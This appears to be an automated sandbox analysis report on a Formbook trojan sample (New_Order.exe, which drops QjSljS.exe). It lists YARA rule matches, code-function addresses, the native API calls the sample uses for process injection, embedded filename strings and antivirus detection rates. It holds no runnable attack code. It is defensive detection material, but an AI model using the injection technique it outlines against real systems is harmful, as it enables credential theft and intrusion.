            Source: 00000013.00000002.4166481175.00000000036D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000A.00000002.1853449511.0000000001130000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000015.00000002.1910322852.0000000000700000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000012.00000002.1910549824.0000000002CB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000014.00000002.4166642046.00000000037D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000D.00000002.4166636409.0000000002960000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000A.00000002.1865768536.00000000015A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 0_2_00EEDC740_2_00EEDC74
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 0_2_0DF007A00_2_0DF007A0
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 0_2_0DF002780_2_0DF00278
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 0_2_0DF007910_2_0DF00791
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 0_2_0DF002680_2_0DF00268
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_004030E010_2_004030E0
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0040289010_2_00402890
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_004161F310_2_004161F3
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0040128010_2_00401280
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0040FD0A10_2_0040FD0A
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0040FD1310_2_0040FD13
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0042A52310_2_0042A523
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_00402D3010_2_00402D30
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0040260310_2_00402603
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0040260910_2_00402609
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0040261010_2_00402610
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0040FF3310_2_0040FF33
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0040DFA910_2_0040DFA9
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0040DFB310_2_0040DFB3
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0128010010_2_01280100
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0132A11810_2_0132A118
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0131815810_2_01318158
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_013441A210_2_013441A2
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_013501AA10_2_013501AA
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_013481CC10_2_013481CC
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0132200010_2_01322000
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0134A35210_2_0134A352
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_013503E610_2_013503E6
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0129E3F010_2_0129E3F0
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0133027410_2_01330274
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_013102C010_2_013102C0
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0129053510_2_01290535
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0135059110_2_01350591
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0133442010_2_01334420
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0134244610_2_01342446
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0133E4F610_2_0133E4F6
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0129077010_2_01290770
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012B475010_2_012B4750
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0128C7C010_2_0128C7C0
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012AC6E010_2_012AC6E0
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012A696210_2_012A6962
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012929A010_2_012929A0
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0135A9A610_2_0135A9A6
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0129A84010_2_0129A840
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0129284010_2_01292840
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012768B810_2_012768B8
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012BE8F010_2_012BE8F0
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0134AB4010_2_0134AB40
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01346BD710_2_01346BD7
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0128EA8010_2_0128EA80
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0129AD0010_2_0129AD00
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0132CD1F10_2_0132CD1F
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012A8DBF10_2_012A8DBF
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0128ADE010_2_0128ADE0
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01290C0010_2_01290C00
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01330CB510_2_01330CB5
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01280CF210_2_01280CF2
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01332F3010_2_01332F30
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012D2F2810_2_012D2F28
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012B0F3010_2_012B0F30
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01304F4010_2_01304F40
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0130EFA010_2_0130EFA0
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01282FC810_2_01282FC8
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0134EE2610_2_0134EE26
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01290E5910_2_01290E59
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0134CE9310_2_0134CE93
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012A2E9010_2_012A2E90
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0134EEDB10_2_0134EEDB
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012C516C10_2_012C516C
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0127F17210_2_0127F172
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0135B16B10_2_0135B16B
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0129B1B010_2_0129B1B0
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0134F0E010_2_0134F0E0
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_013470E910_2_013470E9
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012970C010_2_012970C0
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0133F0CC10_2_0133F0CC
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0134132D10_2_0134132D
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0127D34C10_2_0127D34C
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012D739A10_2_012D739A
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012952A010_2_012952A0
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012AD2F010_2_012AD2F0
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_013312ED10_2_013312ED
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012AB2C010_2_012AB2C0
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0134757110_2_01347571
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0132D5B010_2_0132D5B0
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0134F43F10_2_0134F43F
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0128146010_2_01281460
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0134F7B010_2_0134F7B0
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_013416CC10_2_013416CC
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0132591010_2_01325910
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0129995010_2_01299950
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012AB95010_2_012AB950
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012FD80010_2_012FD800
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012938E010_2_012938E0
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0134FB7610_2_0134FB76
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012AFB8010_2_012AFB80
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01305BF010_2_01305BF0
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012CDBF910_2_012CDBF9
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01303A6C10_2_01303A6C
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01347A4610_2_01347A46
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0134FA4910_2_0134FA49
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012D5AA010_2_012D5AA0
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01331AA310_2_01331AA3
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0132DAAC10_2_0132DAAC
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0133DAC610_2_0133DAC6
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01347D7310_2_01347D73
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01293D4010_2_01293D40
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01341D5A10_2_01341D5A
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012AFDC010_2_012AFDC0
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01309C3210_2_01309C32
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0134FCF210_2_0134FCF2
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0134FF0910_2_0134FF09
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0134FFB110_2_0134FFB1
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01291F9210_2_01291F92
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01299EB010_2_01299EB0
            Source: C:\Users\user\AppData\Roaming\QjSljS.exeCode function: 11_2_022B027811_2_022B0278
            Source: C:\Users\user\AppData\Roaming\QjSljS.exeCode function: 11_2_022B026811_2_022B0268
            Source: C:\Users\user\AppData\Roaming\QjSljS.exeCode function: 11_2_022B07A011_2_022B07A0
            Source: C:\Users\user\AppData\Roaming\QjSljS.exeCode function: 11_2_022B079B11_2_022B079B
            Source: C:\Users\user\AppData\Roaming\QjSljS.exeCode function: 11_2_023145BF11_2_023145BF
            Source: C:\Users\user\AppData\Roaming\QjSljS.exeCode function: 11_2_0231DC7411_2_0231DC74
            Source: C:\Users\user\AppData\Roaming\QjSljS.exeCode function: 18_2_0147516C18_2_0147516C
            Source: C:\Users\user\AppData\Roaming\QjSljS.exeCode function: 18_2_0142F17218_2_0142F172
            Source: C:\Users\user\AppData\Roaming\QjSljS.exeCode function: 18_2_0143010018_2_01430100
            Source: C:\Users\user\AppData\Roaming\QjSljS.exeCode function: 18_2_0144B1B018_2_0144B1B0
            Source: C:\Users\user\AppData\Roaming\QjSljS.exeCode function: 18_2_0142D34C18_2_0142D34C
            Source: C:\Users\user\AppData\Roaming\QjSljS.exeCode function: 18_2_014433F318_2_014433F3
            Source: C:\Users\user\AppData\Roaming\QjSljS.exeCode function: 18_2_0145B2C018_2_0145B2C0
            Source: C:\Users\user\AppData\Roaming\QjSljS.exeCode function: 18_2_014C02C018_2_014C02C0
            Source: C:\Users\user\AppData\Roaming\QjSljS.exeCode function: 18_2_0145D2F018_2_0145D2F0
            Source: C:\Users\user\AppData\Roaming\QjSljS.exeCode function: 18_2_014452A018_2_014452A0
            Source: C:\Users\user\AppData\Roaming\QjSljS.exeCode function: 18_2_0144053518_2_01440535
            Source: C:\Users\user\AppData\Roaming\QjSljS.exeCode function: 18_2_0143146018_2_01431460
            Source: C:\Users\user\AppData\Roaming\QjSljS.exeCode function: 18_2_0144349718_2_01443497
            Source: C:\Users\user\AppData\Roaming\QjSljS.exeCode function: 18_2_0146475018_2_01464750
            Source: C:\Users\user\AppData\Roaming\QjSljS.exeCode function: 18_2_0144077018_2_01440770
            Source: C:\Users\user\AppData\Roaming\QjSljS.exeCode function: 18_2_0144B73018_2_0144B730
            Source: C:\Users\user\AppData\Roaming\QjSljS.exeCode function: 18_2_0143C7C018_2_0143C7C0
            Source: C:\Users\user\AppData\Roaming\QjSljS.exeCode function: 18_2_0145C6E018_2_0145C6E0
            Source: C:\Users\user\AppData\Roaming\QjSljS.exeCode function: 18_2_0144995018_2_01449950
            Source: C:\Users\user\AppData\Roaming\QjSljS.exeCode function: 18_2_0145B95018_2_0145B950
            Source: C:\Users\user\AppData\Roaming\QjSljS.exeCode function: 18_2_0145696218_2_01456962
            Source: C:\Users\user\AppData\Roaming\QjSljS.exeCode function: 18_2_0144599018_2_01445990
            Source: C:\Users\user\AppData\Roaming\QjSljS.exeCode function: 18_2_014429A018_2_014429A0
            Source: C:\Users\user\AppData\Roaming\QjSljS.exeCode function: 18_2_0144284018_2_01442840
            Source: C:\Users\user\AppData\Roaming\QjSljS.exeCode function: 18_2_0144A84018_2_0144A840
            Source: C:\Users\user\AppData\Roaming\QjSljS.exeCode function: 18_2_014AD80018_2_014AD800
            Source: C:\Users\user\AppData\Roaming\QjSljS.exeCode function: 18_2_014438E018_2_014438E0
            Source: C:\Users\user\AppData\Roaming\QjSljS.exeCode function: 18_2_0146E8F018_2_0146E8F0
            Source: C:\Users\user\AppData\Roaming\QjSljS.exeCode function: 18_2_0147889018_2_01478890
            Source: C:\Users\user\AppData\Roaming\QjSljS.exeCode function: 18_2_014268B818_2_014268B8
            Source: C:\Users\user\AppData\Roaming\QjSljS.exeCode function: 18_2_014B5BF018_2_014B5BF0
            Source: C:\Users\user\AppData\Roaming\QjSljS.exeCode function: 18_2_0147DBF918_2_0147DBF9
            Source: C:\Users\user\AppData\Roaming\QjSljS.exeCode function: 18_2_0145FB8018_2_0145FB80
            Source: C:\Users\user\AppData\Roaming\QjSljS.exeCode function: 18_2_014B3A6C18_2_014B3A6C
            Source: C:\Users\user\AppData\Roaming\QjSljS.exeCode function: 18_2_0143EA8018_2_0143EA80
            Source: C:\Users\user\AppData\Roaming\QjSljS.exeCode function: 18_2_01443D4018_2_01443D40
            Source: C:\Users\user\AppData\Roaming\QjSljS.exeCode function: 18_2_0144ED7A18_2_0144ED7A
            Source: C:\Users\user\AppData\Roaming\QjSljS.exeCode function: 18_2_0144AD0018_2_0144AD00
            Source: C:\Users\user\AppData\Roaming\QjSljS.exeCode function: 18_2_01448DC018_2_01448DC0
            Source: C:\Users\user\AppData\Roaming\QjSljS.exeCode function: 18_2_0145FDC018_2_0145FDC0
            Source: C:\Users\user\AppData\Roaming\QjSljS.exeCode function: 18_2_0143ADE018_2_0143ADE0
            Source: C:\Users\user\AppData\Roaming\QjSljS.exeCode function: 18_2_01458DBF18_2_01458DBF
            Source: C:\Users\user\AppData\Roaming\QjSljS.exeCode function: 18_2_01440C0018_2_01440C00
            Source: C:\Users\user\AppData\Roaming\QjSljS.exeCode function: 18_2_01459C2018_2_01459C20
            Source: C:\Users\user\AppData\Roaming\QjSljS.exeCode function: 18_2_014B9C3218_2_014B9C32
            Source: C:\Users\user\AppData\Roaming\QjSljS.exeCode function: 18_2_01430CF218_2_01430CF2
            Source: C:\Users\user\AppData\Roaming\QjSljS.exeCode function: 18_2_014B4F4018_2_014B4F40
            Source: C:\Users\user\AppData\Roaming\QjSljS.exeCode function: 18_2_01482F2818_2_01482F28
            Source: C:\Users\user\AppData\Roaming\QjSljS.exeCode function: 18_2_01460F3018_2_01460F30
            Source: C:\Users\user\AppData\Roaming\QjSljS.exeCode function: 18_2_01432FC818_2_01432FC8
            Source: C:\Users\user\AppData\Roaming\QjSljS.exeCode function: 18_2_01441F9218_2_01441F92
            Source: C:\Users\user\AppData\Roaming\QjSljS.exeCode function: 18_2_014BEFA018_2_014BEFA0
            Source: C:\Users\user\AppData\Roaming\QjSljS.exeCode function: 18_2_01440E5918_2_01440E59
            Source: C:\Users\user\AppData\Roaming\QjSljS.exeCode function: 18_2_01452E9018_2_01452E90
            Source: C:\Users\user\AppData\Roaming\QjSljS.exeCode function: 18_2_01449EB018_2_01449EB0
            Source: C:\Users\user\AppData\Roaming\QjSljS.exeCode function: String function: 014AEA12 appears 36 times
            Source: C:\Users\user\AppData\Roaming\QjSljS.exeCode function: String function: 01487E54 appears 96 times
            Source: C:\Users\user\Desktop\New_Order.exeCode function: String function: 012C5130 appears 58 times
            Source: C:\Users\user\Desktop\New_Order.exeCode function: String function: 0127B970 appears 262 times
            Source: C:\Users\user\Desktop\New_Order.exeCode function: String function: 012FEA12 appears 86 times
            Source: C:\Users\user\Desktop\New_Order.exeCode function: String function: 012D7E54 appears 99 times
            Source: C:\Users\user\Desktop\New_Order.exeCode function: String function: 0130F290 appears 103 times
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0040A163 NtSetContextThread,10_2_0040A163
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_004281B3 NtClose,10_2_004281B3
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0040A9B3 NtMapViewOfSection,10_2_0040A9B3
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0040B283 NtDelayExecution,10_2_0040B283
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0040A373 NtResumeThread,10_2_0040A373
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0040ABE3 NtCreateFile,10_2_0040ABE3
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_00409D43 NtSuspendThread,10_2_00409D43
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0040AE13 NtReadFile,10_2_0040AE13
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0040B6A3 NtAllocateVirtualMemory,10_2_0040B6A3
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_00409F53 NtGetContextThread,10_2_00409F53
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0040A793 NtCreateSection,10_2_0040A793
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012C2B60 NtClose,LdrInitializeThunk,10_2_012C2B60
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012C2DF0 NtQuerySystemInformation,LdrInitializeThunk,10_2_012C2DF0
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012C2C70 NtFreeVirtualMemory,LdrInitializeThunk,10_2_012C2C70
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012C35C0 NtCreateMutant,LdrInitializeThunk,10_2_012C35C0
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012C4340 NtSetContextThread,10_2_012C4340
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012C4650 NtSuspendThread,10_2_012C4650
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012C2BA0 NtEnumerateValueKey,10_2_012C2BA0
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012C2B80 NtQueryInformationFile,10_2_012C2B80
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012C2BE0 NtQueryValueKey,10_2_012C2BE0
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012C2BF0 NtAllocateVirtualMemory,10_2_012C2BF0
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012C2AB0 NtWaitForSingleObject,10_2_012C2AB0
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012C2AF0 NtWriteFile,10_2_012C2AF0
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012C2AD0 NtReadFile,10_2_012C2AD0
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012C2D30 NtUnmapViewOfSection,10_2_012C2D30
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012C2D00 NtSetInformationFile,10_2_012C2D00
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012C2D10 NtMapViewOfSection,10_2_012C2D10
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012C2DB0 NtEnumerateKey,10_2_012C2DB0
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012C2DD0 NtDelayExecution,10_2_012C2DD0
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012C2C00 NtQueryInformationProcess,10_2_012C2C00
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012C2C60 NtCreateKey,10_2_012C2C60
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012C2CA0 NtQueryInformationToken,10_2_012C2CA0
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012C2CF0 NtOpenProcess,10_2_012C2CF0
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012C2CC0 NtQueryVirtualMemory,10_2_012C2CC0
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012C2F30 NtCreateSection,10_2_012C2F30
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012C2F60 NtCreateProcessEx,10_2_012C2F60
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012C2FA0 NtQuerySection,10_2_012C2FA0
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012C2FB0 NtResumeThread,10_2_012C2FB0
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012C2F90 NtProtectVirtualMemory,10_2_012C2F90
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012C2FE0 NtCreateFile,10_2_012C2FE0
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012C2E30 NtWriteVirtualMemory,10_2_012C2E30
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012C2EA0 NtAdjustPrivilegesToken,10_2_012C2EA0
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012C2E80 NtReadVirtualMemory,10_2_012C2E80
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012C2EE0 NtQueueApcThread,10_2_012C2EE0
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012C3010 NtOpenDirectoryObject,10_2_012C3010
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012C3090 NtSetValueKey,10_2_012C3090
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012C39B0 NtGetContextThread,10_2_012C39B0
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012C3D10 NtOpenProcessToken,10_2_012C3D10
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012C3D70 NtOpenThread,10_2_012C3D70
            Source: C:\Windows\SysWOW64\wextract.exeProcess Stats: CPU usage > 49%
            Source: New_Order.exe, 00000000.00000002.1763065406.0000000008A0E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameJkC.exe> vs New_Order.exe
            Source: New_Order.exe, 00000000.00000002.1756730233.0000000004707000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs New_Order.exe
            Source: New_Order.exe, 00000000.00000002.1752800815.0000000000D2E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs New_Order.exe
            Source: New_Order.exe, 00000000.00000002.1763665743.000000000E150000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs New_Order.exe
            Source: New_Order.exe, 0000000A.00000002.1848954122.0000000000E2B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameWEXTRACT.EXE D vs New_Order.exe
            Source: New_Order.exe, 0000000A.00000002.1854001997.000000000137D000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs New_Order.exe
            Source: New_Order.exe, 0000000A.00000002.1848954122.0000000000DF7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameWEXTRACT.EXE D vs New_Order.exe
            Source: New_Order.exeBinary or memory string: OriginalFilenameJkC.exe> vs New_Order.exe
            Source: New_Order.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: QjSljS.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: New_Order.exeReversingLabs: Detection: 67%
            Source: New_Order.exeVirustotal: Detection: 68%
            Source: C:\Users\user\Desktop\New_Order.exeFile read: C:\Users\user\Desktop\New_Order.exeJump to behavior
            Source: New_Order.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\New_Order.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\New_Order.exe C:\Users\user\Desktop\New_Order.exe
